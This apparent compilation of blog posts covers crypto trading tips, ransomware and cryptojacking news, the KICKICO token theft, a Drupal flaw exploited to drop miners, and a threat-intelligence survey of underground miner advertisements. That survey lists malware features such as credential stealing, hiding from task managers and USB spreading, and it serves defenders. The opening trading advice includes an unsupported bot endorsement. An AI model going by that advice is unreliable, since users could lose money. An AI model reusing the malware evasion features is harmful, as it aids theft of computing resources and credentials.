In the cryptocurrency industry, this fact is true that one should buy less and sell more. Now as the trader or investor does not know when the low is going to slide even lower, he must wait for the price consolidation. This means that when the price starts to become constant, or you see the chances of it going up, then attempt to buy. This lowers down the risk of losses.

2. Use of Trading Bots

Most of the cryptocurrency traders do not bother to use trading bots because they think that they can give enough time to their cryptocurrency business. But they neglect the fact that they are not only used as your alternative for work, but this is an efficient and speedy system. Therefore, use one reliable trading box for yourself. As there are several of them available in the market, try to read their reviews, such as Qprofit System Review, etc, to make sure their credibility.

3. Wise Response in Bad Situations

Psychologically, when a person is in stress, anxiety, and depression, he is unable to make rational discussions. In cryptocurrency business, you can come across extreme losses that can drive you crazy. At this point, it is very important that you keep yourself calm and relaxed. Such a wise response on and the situation will help you get out of that loss easily and in a short time. Otherwise, the chances are that you will make the situation even worse. So, in such situations, take your time and try to make responsible decisions.

4. Keep Control in Urgent Situations

Some people make a huge mistake of selling their position when they need money for some urgent thing. There is no harm in selling your position, but the mistake you make is when you do it quickly without thinking about it. Most of the times, such steps result in much more loss to the trader than it would have been otherwise.

5.Resist Temptation of Overtrade

Most of the traders in cryptocurrency business are every restless that they trade in everything when they have money in their pocket. This is a very wrong approach to deal with your money and your business. You must only invest when you have a great idea and conviction.

These are some of the common mistakes that cryptocurrency traders make when they are running their business in this industry. They forget to take small things into account and get themselves into trouble. By taking help from the advice mentioned above, you can avoid losses in your cryptocurrency business and improve the chances of profit.

The post 5 Advice for Common Mistakes Made by Cryptocurrency Traders appeared first on TechWorm.

SamSam Ransomware Attacks Extorted Nearly $6 Million

Ransomware has become a multimillion-dollar black market business for cybercriminals, and SamSam being a great example. New research revealed that the SamSam ransomware had extorted nearly $6 million from its victims since December 2015, when the cyber gang behind the ransomware started distributing the malware in the wild. Researchers at Sophos have tracked Bitcoin addresses owned by the

New Crypto-Mining Malware ZombieBoy Exploits Multiple CVEs for Maximum Impact

ZombieBoy, a new crypto-mining family, recently clocked in at 43 KH/s — or $1,000 per month at current Monero prices.

Independent security researcher James Quinn described ZombieBoy, a new family of crypto-mining malware, in AlienVault on July 18. The name comes from the ZombieBoyTools kit the malware uses to drop its first dynamic link library (DLL) file. Much like MassMiner, ZombieBoy is a highly infectious worm, but it uses WinEggDrop rather than MassScan to identify new hosts.

Before recently shutting down one of its addresses on Monero mining pool MineXMR, the crypto-mining malware was raking in approximately $1,000 worth of the digital currency every month, according to Quinn. Based on its use of the Simplified Chinese language, ZombieBoy likely originates from China.

ZombieBoy Exploits Multiple CVEs to Beat Security Defenses

ZombieBoy leverages multiple vulnerabilities to compromise networks, including CVE-2017-9073, a remote desktop protocol (RDP) vulnerability on XP and Server 2003, and Server Message Block (SMB) exploits CVE-2017-0143 and CVE-2017-0146. It then uses DoublePulsar and EternalBlue to create multiple backdoors, both increasing the chance of compromise and making it harder for IT teams to eliminate infections.

The crypto-mining malware is encrypted with Themdia and won’t run on virtual machines (VMs). This makes it hard to both capture and reverse engineer, limiting the efficacy and development of countermeasures.

ZombieBoyTools is linked to other Chinese malware like IRON TIGER APT (itself a variant of Gh0st RAT). This suggests not only persistence but also continued evolution. ZombieBoy’s double backdoors could pave the way for crypto-mining malware and leave the gate open for ransomware, keyloggers and other malicious tools.

How Can Companies Combat Crypto-Mining Malware?

While it’s tough to stop threats like ZombieBoy outright, companies can take action to limit risk. IBM security researchers recommend blocking command-and-control (C&C) traffic that exploits like DoublePulsar and EternalBlue rely on using signatures such as SMB_EternalBlue_Implant_CnC and SMB_DoublePulsar_Implant_CnC.

Security experts also recommend building intelligent, integrated immune systems capable of responding to multiple threats, including crypto-mining, ransomware and distributed denial-of-service (DDoS) attacks. This ecosystem of solutions should include two-factor authentication (2FA), advanced web application firewalls and the ability to limit or disable unused ports and services.

Source: Alien Vault


The post New Crypto-Mining Malware ZombieBoy Exploits Multiple CVEs for Maximum Impact appeared first on Security Intelligence.

KICKICO Hacked: Cybercriminal Steals $7.7 Million from ICO Platform

Again some bad news for cryptocurrency users. KICKICO, a blockchain-based initial coin offering (ICO) support platform, has fallen victim to a suspected cyber attack and lost more than 70 million KICK tokens (or KickCoins) worth an estimated $7.7 million. In a statement released on its Medium post on July 26, the company acknowledged the security breach, informing its customers that an

Unknown attacker runs off with $7.7 million in KickCoin after hacking 40 wallets

The cryptocurrency craze is showing no signs of stopping as exchanges and ICO (Initial Coin Offering) platforms continue to experience breaches and virtual robberies. The latest such example comes from KICKICO, whose clients lost a whopping $7.7 million in Kick tokens, or KickCoins, after getting hacked by an unknown attacker.

The firm acknowledges the attack in a July 26 post on Medium, admitting it hadn’t a clue about the breach until customers desperately called in to report losing hundreds of thousands of dollars’ worth of KickCoin (a ‘sub-species’ of the digital currency Ethereum) overnight.

“KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets,” the post reads.

Apparently, the attacker avoided tripping any wires by simply destroying tokens at 40 addresses and creating tokens (in the exact corresponding amount) at another 40 addresses controlled by him. As KICKICO would normally notice such substantial and sudden shifts in funds, this method enabled the thief to fly under the radar.

An investigation into the hack revealed that the perp managed to run off with a total of 70,000,000 KICK, or the equivalent to $ 7.7 million at the time.

“Thanks to the rapid response of our community and our coordinated team work, we were able to regain control over the tokens and prevent further possible losses by replacing the compromised private key with the private key of the cold storage,” the firm notes.

An apologetic KICKICO encourages everyone with questions regarding the attack to contact the company through its official social channels or email ( Perhaps the best news is that all KickCoin holders who saw their wallets emptied will soon see their funds replenished.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences, but claim that the situation is under control,” says KICKICO.

Google Play Store no longer accepts crypto-mining apps

Taking a leaf from Apple’s rulebook regarding cryptocurrency mining, Google has updated its Play Store guidelines to keep shady financial instruments out of its Android applications venue.

Over on the Google Play Developer Policy Center, the tech giant explicitly states: “We don’t allow apps that expose users to deceptive or harmful financial instruments.” This isn’t a new policy from the Internet behemoth. However, the company has recently made an addendum to this category.

“We don’t allow apps that mine cryptocurrency on devices. We permit apps that remotely manage the mining of cryptocurrency,” reads the newly added guideline.

In other words, Google Play will no longer be accepting any tools advertised as capable of mining virtual money using the customer’s mobile device. Google doesn’t expressly state the reasons behind its decision. However, it is reasonable to assume that the company wants to steer Android users clear of any potentially deceptive application description.

Google has yet to yank some existing crypto-mining apps from its Play Store. MinerGate Mobile Miner is perhaps the perfect example of deceptive advertising (considering the sheer processing horsepower needed to generate even a small amount of cryptocurrency). The app’s description states (emphasis ours):

“Start mining cryptocurrencies on the go! Most promising altcoins, such as Monero and Bytecoin, wallet stats and more. Make a mobile crypto fortune with MinerGate and exchange it to Bitcoin, Ethereum, Litecoin and other coins on our convenient exchange”

While MinerGate and other apps like it aren’t illegal, Google nonetheless appears keen on ridding its Android ecosystem of a potentially harmful experience. It remains to be seen how long it takes the web giant to eliminate all crypto-miners from its Play Store.

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns have suffered a security breach and as a result, hackers have stolen more than 70 million KickCoins which is around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]

This is a post from Read the original post: ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

Google Bans Cryptocurrency Mining Android Apps From the Play Store

Following Apple's lead in banning cryptocurrency mining apps, Google has also updated its Play Store policy this week to ban apps that mine cryptocurrencies on users' devices in the background. However, there are countless cryptocurrency mining apps, including MinerGate, AA Miner, NeoNeonMiner, and Crypto Miner, still available on the Play Store. Cryptocurrency mining is not a new concept,

What financial service providers should know about blockchain: Opportunities and threats

It seems that every few years, an advanced and innovative new technology emerges and becomes the next big thing for organizations across different industries. Take the cloud and big data, for example – during their buzzword stage, these concepts were being attached to just about everything in the tech space.

Currently, it appears that blockchain has filled this space, popping up in discussions and initiatives within all types of businesses. For financial services in particular, though, it’s very imperative to not only understand the basics of blockchain, but also examine the kinds of threats and opportunities this concept will bring.

Where to start: The basics

First and foremost, financial service providers must understand what blockchain actually is. In the current industry, this can be difficult, as there are an array of different definitions available. But the main points common across expert explanations include:

  • Blockchain is the underlying technology that makes cryptocurrencies like Bitcoin possible.
  • Blockchain is a digital ledger wherein the information associated with cryptocurrency transactions is checked and verified.
  • Cryptocurrency miners doing this verification must also leverage powerful computer systems in order to resolve hash functions in order to add verified transactions to the blockchain.
  • Once a transaction is verified and the associated hash algorithm is resolved, the transaction is included in the next block of the blockchain, which is then unchangeable and part of the overall digital ledger.
  • Cryptocurrency miners receive a small digital currency profit for their efforts.

Without this system, there would be no way to verify or track the transactions taking place with digital currencies. And as new cryptocurrencies emerge, additional blockchains are established to underpin the value of the currency.

Blockchain offers certain use cases for financial service organizations.

How will blockchain impact financial services?: Opportunistic use cases

As a public ledger supporting cryptocurrency, blockchain appears to be right up financial services’ alley. At the same time, though, because anyone can review and add to a public blockchain, making it a system without a central, financial service authority, where do opportunities lie for businesses in this industry?

As Deloitte explained, there is absolutely room within this growing sector for financial service organizations to take advantage of the benefits of blockchain. A few use cases to consider include:

  • Supporting international transactions: Because blockchain enables a cryptocurrency value that is consistent across the globe, blockchain could be just the thing to enable faster and more streamlined cross-border transactions. This has traditionally been a slow and costly process, but blockchain could potentially considerably reduce the complexity involved.
  • Enabling share trading: Blockchain and cryptocurrency could also be leveraged within the stock market to allow for streamlined share trading while providing additional advantages like boosted accuracy and faster settlement.
  • Enhancing identity management: A blockchain-style system could also potentially be applied to online identity management, where users register themselves on the blockchain and can then choose who will be privy to their identity.
  • Improving loyalty rewards: Deloitte noted that banks could also utilize blockchain as a way to better trace transactions, and provide improved rewards for customer loyalty programs.

Issues to be aware of: Cryptojacking

Despite the opportunities that blockchain can provide – including impactful use cases outside of just cryptocurrency mining – there are also a few issues that financial service providers should be aware of.

First is the malicious activity that has emerged with the rising popularity of mining. As noted, in order for the blockchain to work, users must verify the information of cryptocurrency transactions, resolve a hash function and then add the transaction to the next block in the chain. Once this is performed, the cryptocurrency miner supporting this process receives a small reward for verifying and enabling the next set of transactions in the blockchain.

Unsurprisingly, cybercriminals have taken note and are now taking over victims’ systems for this purpose, an attack style now known as cryptojacking. As Trend Micro reported, cryptojacking is on the rise: Late last year, hackers enabled a campaign that impacted almost 1,500 websites, thanks to embedded cryptocurrency mining code within a live assistance widget.

Immutable nature of the blockchain

Another important aspect to understand about blockchain is the fact that transactions added to blocks in the chain are uneditable and unchangeable once verified and included in the digital ledger. This is the way the system was designed, as changing one part of a block could impact all the subsequent blocks added afterwards – similar to a long math problem, wherein a mistake early on affects all calculations that followed.

“Each block has a hash based on its contents, and carries the has of its predecessor,” Trend Micro CISA VP of Infrastructure Strategies William Malik wrote. “So when you look at a block on a blockchain, you can trace the block back through its predecessors to the founding block. Changing the contents of a block changes the block’s hash. If a block’s hash changes, the successor blocks will no longer reference it. Rebuilding the chain with with the replacement block means the has for each successive block will have to be recalculated, which is an enormous computational task.”

And, as Malik pointed out, this part of the blockchain process could have considerable repercussions, particularly in the face of new industry regulations like the European Union’s General Data Protection Regulation (GDPR).

Blockchain and GDPR

GDPR includes several key data protection rules for EU data subjects, but is a global standard that impacts every organization that in any way does business or supports the needs of EU citizens – including U.S.-based institutions.

One rule included in the standard is the Right to be Forgotten, which states that EU citizens can request that organizations using their personal data remove this information from the record. However, as Malik noted, this could be potentially disastrous for institutions that take part in the blockchain, including financial service providers.

“Under GDPR, an organization that constructs a blockchain may have to remove a block or modify some data to comply with a request to forget someone,” Malik wrote. “GDPR does not prohibit blockchain, but it does put some procedural requirements around blockchain’s use in commercial enterprises.”

As Malik explained, one of the only ways to ensure compliance with GDPR while maintaining the integrity and accuracy of the blockchain would be to create a system that enable the dissociation of a particularly identity with the relevant information included in the blockchain. In this way, data subjects can be protected and the unchangeable blockchain can persist.

Overall, blockchain is still a complex and immature, emerging technology. However, it does provide certain opportunities for financial service providers who are willing to also consider and balance these benefits with associated risks.

To find out more about blockchain and its use in financial services, connect with the experts at Trend Micro today.

The post What financial service providers should know about blockchain: Opportunities and threats appeared first on .

The trend toward cryptojacking: What it is and how businesses can prevent it

Digital attacks have evolved quite a bit in recent years. First, businesses and researchers observed a rash of ransomware, wherein encryption was exploited to lock users out of their data and files in an attempt to collect financial ransom.

Now, the next big wave in cybercriminal strategy has come, involving increasingly popular cryptocurrencies and the ability to leverage the computer power of unknowing users’ systems to mine a profit. This process is called cryptojacking – and it’s putting businesses and individual users all across the globe at potential risk.

Understanding cryptojacking: Defining the basics

Ahead of delving into this new cybercriminal process, let’s break down the underlying concepts.

Cryptojacking revolves around cryptocurrency mining, a process in which users leverage infrastructure systems and their computing power in order to verify digital transactions and reconcile associated hash function algorithms. This process enables users to create the next block of transactions in the blockchain, the digital, unchangeable ledger wherein all cryptocurrency transactions are recorded and compiled. Once a transaction is verified, the next block in the blockchain is created – once established, blocks within the blockchain and their associated transactions can not be adjusted or shifted.

“Each time a cryptocurrency transaction is made, a cryptocurrency miner is responsible for ensuring the authenticity of information and updating the blockchain with the transaction,” Webopedia explained. “The mining process itself involves competing with other cryptominers to solve complicated mathematical problems with cryptographic hash functions that are associated with a block containing the transaction data.”

The miner that is first able to resolve the hash functions is then able to authorize the transaction and earn a small profit in cryptocurrency for adding to the blockchain. It is this

competitive nature and potential for reward – despite only being a small amount per transaction – that has attracted hackers and other malicious actors to the arena.

Cryptojacking involves the fraudulent use of user systems for cryptocurrency mining.

Cryptocurrency mining vs. cryptojacking: What’s the difference?

Legitimate users, leveraging their own systems and the required specialized mining hardware, can engage in cryptocurrency mining. In fact, as noted above, the process is essential for verifying transactions hinging upon the use of cryptocurrency, and to support the continual growth of the underlying blockchain ledger.

However, there is a stark difference between legitimate and necessary cryptocurrency mining and malicious cryptojacking processes. The distinction here rests in authorized use.

Cryptocurrency miners utilize their own systems and therefore have authorized permission to leverage this computing power in order to solve the associated hash functions and create the next block of transactions in the blockchain. Those engaged in cryptojacking, on the other hand, breach and use someone else’s computing systems in an unauthorized manner.

Within cryptocurrency mining, the miner is the authorized user of the system being leveraged and reaps the small cryptocurrency reward for verifying transactions. Cryptojacking sees this reward delivered to the hacker who has broken in and is stealing the resources of another user’s systems.

As CSO contributor Michael Nadeau explained, the infection process is somewhat similar to other attack styles like ransomware.

“Hackers do this by either getting the victim to click on a malicious link in an email that loads cryptomining code on the computer, or by infection a website or online ad with JavaScript code that auto-executes once loaded in the victim’s browser,” Nadeau wrote. “Either way, the cryptomining code then works in the background as unsuspecting victims use their computers normally.”

Once infected, users are often unaware that their systems have been leveraged for cryptojacking by an unauthorized intruder. In this way, the malicious actor can allow the cryptomining software to operate in the background and enable them to earn a profit by verifying cryptocurrency transactions.

As Nadeau pointed out, the only somewhat tell-tale sign of cryptojacking is a slowdown or lag in performance or action execution, which can also be a symptom of an array of other types of infections or system issues.

There’s a substantial difference between cryptojacking and cryptocurrency mining.

Cryptojacking campaign discovered: Infected live support platform

Concrete evidence in the rise of cryptojacking lies in the increasing discovery of infected sites, spreading cryptomining software to unsuspecting visitors. Trend Micro reported on just such an instance in November 2017, wherein a considerably large cryptojacking campaign was uncovered, with a live chat and support platform at the center.

Security researchers discovered that nearly 1,500 websites that included a widget for the live chat and support platform were infected and being used for cryptocurrency mining.

“A copy of the Coinhive in-browser cryptocurrency miner was found inside a JavaScript file used by LiveHelpNow, a live chat and support platform that was being loaded on the websites,” Trend Micro reported.

This issue is worsened by the fact that the JavaScript code doesn’t have to be specifically installed in order to allow for cryptojacking – users need only visit the affected websites that include the LiveHelpNow widget including the Coinhive code. Once a user loads the webpage, the mining code runs automatically within their browser.

Many of the 1,500 sites impacted by the infected LiveHelpNow widget were e-commerce companies and small, private businesses. Interestingly, attackers chose an ideal time to put the cryptomining code in place – right ahead of the busy end-of-year shopping season.

Recognizable names including Everlast were included in the list of affected websites included in this cryptojacking campaign. Other organizations’ websites – including Politifact, Showtime and even Pirate Bay – have also been impacted by cryptomining code.

“Users accessing the affected websites will see their CPU usage shoot as Coinhive script mines the Monero cryptocurrency for another party,” Trend Micro noted.

The issue for businesses: Cryptojacking prevention

While cryptojacking is certainly a prominent risk for all users, the threat could hit enterprises particularly hard. When available CPU resources are being leveraged to support cryptomining, the performance of other platforms that rely on this support will suffer. This can prevent employees from properly engaging and using company platforms and necessary software. And while cryptocurrency mining and cryptojacking are still in their infancy, now is the time for organizations to prepare and guard against this threat.

First, it’s imperative to include cryptojacking as part of security awareness training. When workers and IT department members in particular understand what to look for, they can help reduce the risk. There are also ad-blocking and anti-cryptomining extensions that can be installed within web browsers to help avoid infections.

Endpoint protection and specific, robust solutions like Trend Micro Smart Protection Suites and Worry-Free Business Security can help safeguard organizations and their users through the fast detection and blocking of malicious files and websites.

To find out more, connect with the experts at Trend Micro today.

The post The trend toward cryptojacking: What it is and how businesses can prevent it appeared first on .

IBM fixes flaw that let hackers replace its serverless code with their own

By Waqas

This is the first publicly-disclosed vulnerability in a serverless platform. Experts at IBM (The International Business Machines Corporation) have patched a critical vulnerability in its Cloud Functions which if exploited could allow remote malicious hackers to replace company’s serverless code with their own. Once the changes took effect, hackers could have extracted sensitive customer data including […]

This is a post from Read the original post: IBM fixes flaw that let hackers replace its serverless code with their own

Nicholas Weaver on Cryptocurrencies

This is well-worth reading (non-paywalled version). Here's the opening:

Cryptocurrencies, although a seemingly interesting idea, are simply not fit for purpose. They do not work as currencies, they are grossly inefficient, and they are not meaningfully distributed in terms of trust. Risks involving cryptocurrencies occur in four major areas: technical risks to participants, economic risks to participants, systemic risks to the cryptocurrency ecosystem, and societal risks.

I haven't written much about cryptocurrencies, but I share Weaver's skepticism.

Threat Actors Exploit New Drupal Flaw to Deliver Cryptocurrency Mining Malware

Back in March 2018, Drupal security teams fixed CVE-2018-7600 (also known as Drupalgeddon 2) and discovered another vulnerability (CVE-2018-7602) that could be exploited to deliver cryptocurrency mining malware in the process. Attacks against sites leveraging the open source content management system began just hours after the CVE-2018-7602 patch was released, giving site owners and operators little time to respond, Bleeping Computer reported in April 2018.

While the patch effectively curtails this crypto-mining effort, not all companies have implemented the fix.

How the Drupal Flaw Facilitates Cryptocurrency Mining

Monero mining is the aim of cybercriminals leveraging CVE-2018-7602. With 85 percent of all crypto-mining attacks now using Monero — and thieves grabbing more than $175 million from malicious mining techniques — it’s no surprise cybercriminals are exploiting this longstanding Drupal flaw to move more of the digital currency.

The method here is remote code execution (RCE), which affects Drupal versions 7 and 8. According to Trend Micro, the attack starts with a shell script download, followed by an Executable and Linkable Format (ELF) downloader to add a crontab entry. Since Drupal lacks input sanitization of # characters in URLs, threat actors can bypass standard protections to install Monero-based mining malware.

This attack vector also uses HTTP 1.0 POST to return data, making it an outlier since most organizations now use HTTP 1.1 or higher. As a result, businesses may not immediately flag this Drupal activity as suspicious.

How Critical Is the Vulnerability?

According to Drupal, this vulnerability is rated “highly critical” with a score of 20 out of 25. Attackers can leverage the flaw to take control of Drupal sites; install cryptocurrency miners and distributed denial-of-service (DDoS) malware; and create backdoors for easy, long-term access.

Threat actors are also using the Tor network to obfuscate their activity. When Trend Micro traced the attacks back along their IP trail, the endpoint was an IP address owned by a virtual private network (VPN) provider that’s also a Tor exit node.

Using open source Monero miner XMRig version 2.6.3, meanwhile, the malware checks whether potential targets are already compromised and then alters behavior to limit possible discovery, according to an IBM X-Force advisory. As a result, everything from compromised website performance to complete loss of control and ongoing vulnerability are on the table if companies are compromised.

Patching Makes Perfect

As noted by Sensors Tech Forum, CVE-2018-7602 “exists within multiple subsystems of Drupal 7.x and 8.x” and “could cause severe damage to a website, which could be hacked via remote code execution due to a missing input validation.”

To avoid potential problems, enterprises should:

  • Upgrade to Drupal 7.59 from 7.x.
  • Upgrade to Drupal 8.5.3 from 8.5x.
  • Upgrade to Drupal 8.4.8 from 8.4x.
  • Patch directly for 8.x or 7.x if an immediate upgrade isn’t possible (requires SA-CORE-2018-002 fix).
  • Monitor for signs of cryptocurrency mining infection, such as reduced performance and increased communications traffic that favors longer uploads and shorter downloads.

Sources: Bleeping Computer, Trend Micro, Drupal, Sensors Tech Forum

The post Threat Actors Exploit New Drupal Flaw to Deliver Cryptocurrency Mining Malware appeared first on Security Intelligence.

Blocking Cryptocurrency Mining with Cisco Talos

The value of cryptocurrencies has fluctuated wildly, but the value is still high enough to garner a lot of attention, both legitimate and malicious. Most of the malicious activity we see is done for financial gain, and cryptocurrencies have provided attackers with a lucrative new avenue to pursue: cryptocurrency mining.

Over the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. This threat is spreading across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. That doesn't include the quasi-legitimate in-browser mining that is becoming increasingly common.

Generally speaking, cryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. Enterprises need to start making tough policy decisions regarding cryptocurrency mining. It is common for end users to try and generate additional revenue by installing miners on their desktop and mining off-hours. This type of activity needs to be addressed by the enterprise. However, it will be detected along with malicious cryptocurrency mining in the environment.

To understand the different ways to block cryptocurrency mining, you need to know how pool-based mining works and how adversaries take advantage of it. Taking a single standalone system is not an effective way to generate significant revenue and, in conjunction with electricity usage, does not make sense for the average user to pursue.

However, if you have a large block of systems and leverage pool-based mining, the profits can add up, and adversaries have noticed. Malicious actors have pivoted and started using open-source cryptocurrency miners. The ability to quickly deploy these miners without requiring true command and control access has made them incredibly attractive. The results have been stunning. We have seen massive campaigns generating hundreds of thousands, if not millions of dollars, for the attackers. The size and scale of this problem are just starting to come into focus and looks to be worsening in the near term. This brings us to the challenge of detection.

Since these miners rely on both end systems and network traffic to operate, it creates many different avenues for detection. Cisco Talos is releasing a whitepaper that provides a high-level overview of what malicious cryptocurrency mining is and the plethora of different ways that Cisco Talos goes about blocking it. This includes technologies like Cisco Intrusion Prevention System (IPS), Advanced Malware Protection (AMP), Umbrella, and Threat Grid, among others.

For the full details of all the methods and technologies Cisco Talos uses to thwart this threat, download the full whitepaper here.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners


Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.

Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities











Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option

Figure 3: Monero Madness

Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel

Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

